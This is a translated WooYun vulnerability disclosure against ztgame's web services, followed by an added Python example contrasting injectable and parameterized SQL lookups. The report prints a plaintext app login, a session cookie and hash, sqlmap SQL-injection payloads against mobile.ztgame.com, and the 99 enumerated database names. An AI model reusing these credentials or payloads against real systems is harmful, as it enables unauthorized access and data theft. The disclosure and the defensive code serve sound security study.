WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online viewer -------- http://drop.zone.ci/
2015-12-01: Details sent to the vendor; awaiting the vendor's handling
2015-12-02: Vendor has confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and relevant domain experts
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public
A bundle of vulnerabilities; hoping for a fair 20 rank
0x01: File directory traversal vulnerability. Address: http://event.ztgame.com
0x02: Weak password on the unified data Android app: http://mobile.ztgame.com/mobile/index.php Account: wangwei Password: 123456
0x03: SQL injection vulnerability, involving 99 databases. Vulnerable address:
GET /mobileapp/zhibiao.php HTTP/1.1
Host: mobile.ztgame.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Referer: https://mobile.ztgame.com/mobileapp/index.php
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: m_username=wangwei*; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3
X-Requested-With: com.ztgame.openurl
The m_username parameter in the Cookie header is injectable.
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m_username=wangwei' AND 4789=4789 AND 'fWPU'='fWPU; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m_username=wangwei' AND (SELECT 9825 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(9825=9825,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JNwZ'='JNwZ; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m_username=wangwei' AND (SELECT * FROM (SELECT(SLEEP(5)))yQuv) AND'Hocl'='Hocl; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3
---
[21:44:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.4.4
back-end DBMS: MySQL 5.0
99 databases involved:
available databases [99]:
[*] a_consume_day
[*] a_ly360_consume_day
[*] a_ptaidata_web
[*] a_zoneinfo_hour
[*] action_rpt_god
[*] action_rpt_hs
[*] action_rpt_pla
[*] action_rpt_xxsj
[*] action_rpt_ztgame
[*] action_rpt_ztnew
[*] all_zoneInfo
[*] all_zoneInfo_hour
[*] anti_fraud_cheat_account
[*] anti_fraud_stat
[*] area_stat_rpt
[*] buy_silver
[*] caiwu_check
[*] caiwu_data_report
[*] cb_rpt
[*] check_ordervsobj
[*] check_up
[*] classify_user_rpt
[*] consume_vip
[*] cs_order
[*] csjz_cb_tmp
[*] csjz_hour_stat
[*] data_node_course_detail
[*] data_node_name_day
[*] db_union_sortlist
[*] dim_tpart_config
[*] dim_zoneinfo_for_xinjian
[*] easy_consume_rpt
[*] finance_dw
[*] finance_lost_reg
[*] GAQ
[*] GAQ1_download
[*] GAQ4_download
[*] GAQ5_download
[*] GAQ6_download
[*] GAQ8_download
[*] GAQ9_download
[*] hbs
[*] hour_computer
[*] hour_computer_back
[*] hour_computer_bak11111
[*] information_schema
[*] jh_sortlist
[*] loading_lost
[*] mail_quick
[*] media_stat
[*] money_monitor
[*] mysql
[*] new_user_rpt
[*] newzone_15index
[*] objkeywords_stat
[*] peng
[*] ptai_stat_219
[*] ptai_stat_report
[*] ptai_stat_report_del
[*] ptai_stat_rpt
[*] realtime_rpt
[*] realtime_rpt_test
[*] realtime_rpt_tmp
[*] remain_rpt
[*] report
[*] resource_manage_system
[*] rpt_client_adcost
[*] rpt_client_ptai_stat
[*] rpt_mobile_conf
[*] rpt_mobile_consume_stat
[*] rpt_mobile_ptai_stat
[*] rpt_mobile_realtime_stat
[*] rpt_mobile_realtime_stat_test
[*] rpt_mobile_user_trace
[*] rpt_mobile_user_trace_test
[*] rpt_must_ptai_stat
[*] rpt_must_user_trace
[*] scb_ws
[*] scb_xxsj
[*] select_db_detail
[*] sobj_stat
[*] sortlist_collect_rpt
[*] stat
[*] stat_analyze
[*] stat_consume
[*] test
[*] transform_rpt
[*] user_analyze
[*] user_analyze_xt
[*] user_analyze_zt2
[*] user_analyze_ztgame
[*] user_center_rpt
[*] user_segmentation_report
[*] vip
[*] vip_xt_obj
[*] vip_zt2_obj
[*] vip_ztgame_obj
[*] xxxx
[*] zoneinfo
You are the professionals here.
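The sqlmap output above shows that the m_username cookie value is spliced into a MySQL query on the server. The added example below is not code from the report or from ztgame; it assumes (since the report does not show the server-side code) that the application looks the logged-in user up by the m_username cookie, and it uses a constructed in-memory SQLite table standing in for the real backend. It writes that lookup twice, once built by string formatting, as the report implies, and once with a bound parameter, then feeds both the benign cookie value and the boolean-based payload from the report through each, alongside a simple allowlist check on the cookie value as a second layer.

```python
import re
import sqlite3

# Assumed allowlist for account names: the report shows the username "wangwei",
# so a short alphanumeric pattern is used here as a constructed example of
# rejecting cookie values that could never be a real account name.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

# Cookie header from the report, with sqlmap's '*' injection marker removed.
REPORT_COOKIE = ("m_username=wangwei; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; "
                 "PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3")

# The boolean-based blind payload sqlmap reported for m_username.
TRUE_PAYLOAD = "wangwei' AND 4789=4789 AND 'fWPU'='fWPU"


def parse_cookie_header(header_value):
    """Split a raw Cookie header value into a dict (last duplicate name wins)."""
    cookies = {}
    for part in header_value.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def username_is_well_formed(value):
    """Allowlist check: True only for values that look like an account name."""
    return USERNAME_RE.match(value) is not None


def make_db():
    """Constructed stand-in for the real users table (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, display_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("wangwei", "Wang Wei"), ("alice", "Alice")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, m_username):
    """String-built SQL: a quote in the cookie closes the literal and the
    remainder is parsed as SQL, which is what makes the cookie injectable."""
    sql = "SELECT display_name FROM users WHERE username = '%s'" % m_username
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, m_username):
    """Parameterized SQL: the cookie value is bound as data by the driver and
    is never parsed as SQL syntax, so the payload matches no account."""
    sql = "SELECT display_name FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (m_username,))]


def demo():
    """Run the benign cookie value and the report's payload through both lookups."""
    conn = make_db()
    benign = parse_cookie_header(REPORT_COOKIE)["m_username"]
    return {
        "benign_vulnerable": lookup_vulnerable(conn, benign),
        "benign_hardened": lookup_hardened(conn, benign),
        "payload_vulnerable": lookup_vulnerable(conn, TRUE_PAYLOAD),
        "payload_hardened": lookup_hardened(conn, TRUE_PAYLOAD),
        "payload_well_formed": username_is_well_formed(TRUE_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

With the string-built query the payload still returns the wangwei row, because the injected `AND 4789=4789` is true; flipping the comparison would return nothing, which is exactly the oracle sqlmap used to enumerate the 99 databases. With the bound parameter the same payload is compared as one literal string and returns no row, and the allowlist check rejects it before any query runs.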
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-12-02 14:35
Thanks 路人甲, keep up the good work! 20 rank awarded
None yet